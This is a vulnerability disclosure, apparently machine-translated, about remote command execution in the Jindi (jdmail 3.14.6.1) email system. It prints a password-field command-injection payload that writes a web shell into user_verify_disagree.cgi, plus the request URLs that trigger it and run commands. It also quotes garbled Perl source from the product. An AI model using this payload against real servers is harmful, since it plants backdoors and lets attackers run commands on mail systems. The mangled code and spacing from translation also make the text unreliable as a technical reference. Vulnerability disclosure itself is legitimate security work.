Jindi email system Remote Command Execution
Jin Di @ email system is a distributed, large-capacity, high-availability email system developed by Jin Di software for many years. It adopts open technical architectures such as linux, xml, and java, providing high reliability and scalability. It is widely used in e-government websites, golden tax projects, IDCs, and portal websites of various industries.
Test version: jdmail3.14.6.1
Restrictions: User Registration is allowed.
Vulnerability Analysis:
First, you must register an account and send it to the Administrator for review. For example, if the user name is test, change the domain name address:
Username: test
For windows, SET Password: 1 | echo: system ($ B = $ cgi-^> param (a)> user_verify_disagree.cgi;
The official website is the linux version. The local windows test was successful.
In jdwa/cgi/config. cgi, the system function command is called.
# Sub ctrlcmd {my ($ cmd, $ op1) =@_; my $ rep; my $ port =cfg cfg {'ctrlprt '}; $ port = '000000' if! $ Port; my $ admin = & dec_str ($ cfg {'admin'}); my $ pass = & dec_str ($ cfg {'pass '}); my $ ctrl = "$ cfg {'jdmaildir'}/$ ctrlclnt-s localhost-n $ port-u \" $ admin \ "-p \" $ pass \""; if (! $ Op1) {system ("$ ctrl $ cmd");} else {$ rep = '$ ctrl $ cmd';} $ rep ;}
Use it in user_verify_agree.cgi:
#! Perl.exe if ($ ENV {'server _ soft'} = ~ /IIS. \ d +. 0 $/) {my $ cd = $0; $ cd = ~ S/[^ \] * $ //; chdir ($ cd);} require "config. cgi "; use CGI; my $ cgi = new CGI; my % users = (); my $ number = 0; my $ new_user = $ cgi-> param ("checkbox"); my ($ name, $ domain, $ pass1, $ realname, $ depart, $ question, $ answer, $ msg); $ new_user = ~ S/\ s + $ //; if (! $ New_user | $ new_user = ~ /^ \ S + $/) {print "Content-Type: text/html; charset = UTF-8 \ n"; print "CacheControl: no-cache \ nPragma: no-cache \ nExpires:-1 \ n "; print qq ~ <Html>
In the above process, special characters are not filtered by the password, resulting in command injection.
Restrictions: spaces are not allowed.
Method: Write a backdoor to an existing file without spaces. replace it.
Password: 1 | echo: system ($ B = $ cgi-^> param (a)> user_verify_disagree.cgi;
Test exp:
1. Register a user named test123 with the password: 1 | echo: system ($ B = $ cgi-^> param (a)> user_verify_disagree.cgi;
2. Access http: // 127.0.0.1/JDWA/cgi/user_verify_agree.cgi? Checkbox = mailer.com.cn + test123,
An error occurred while prompting for review
3. Access http: // 127.0.0.1/JDWA/cgi/user_verify_agree.cgi? A = dir
The access is successful and the directory can be written.
Solution:
Enhanced Filtering